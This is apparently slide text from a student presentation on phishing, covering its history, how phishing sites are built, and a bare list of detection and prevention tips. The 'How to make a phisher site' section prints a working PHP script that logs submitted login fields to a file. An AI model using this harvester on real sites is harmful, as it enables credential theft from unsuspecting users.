Você está na página 1de 20

Phishing

Guided By
M.Chandu Jagan Shekar BY
Asst Professor P.Srikanth
Dept of IT IT(07U41A1240)
Contents
Introduction
How to make a phisher site?
How to use a phisher site?
How the phishing happens/done?
Detecting phishing sites?
Preventing from phisher
Reporting phishing
Introduction
History:
Introduced in 1987, and the first use of the term
"phishing" was made in 1996.

Definition:
Process of attempting to acquire sensitive
information such as usernames, passwords and credit
card details.
How to make a phisher site?
Making a Phishing site contains 3 steps:

Creating the login page.

Redirecting.

Embedding Script(PHP).
Creating a login page:
Redirecting
Original site redirection Fake site redirection
Embedding Script(PHP)

<?phpheader("");
   $handle = fopen("name.txt", "a");
   foreach($_GET as $variable => $value)
{
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
  }
  fwrite($handle, "\r\n");
  fclose($handle);
  exit;?>
How the phishing happens/done?
Instant messaging
While chatting with someone by using the
Messenger’s like yahoo,Gmail.etc.
Links to
fake
page of
corresp
onding
site
How The Phishing happens/done?
http://ww
Fake E-mails w.trusted-
bankin/lo
gin.html
Structure of phishing

1 7
5
6
2

3
4
Detecting & Preventing Phishing Sites

HTTP – HTTPS

Digital Signatures

Wrong password (redirecting)

Email notice
• HTTP-HTTPS
• HTTP-HTTPS
• Digital signatures…
• Wrong Password (Redirecting)
• Email notice

• Wrong Password (Redirecting)

Not the real


address bar
Reporting Phishing
Queries plzzzzzz

Você também pode gostar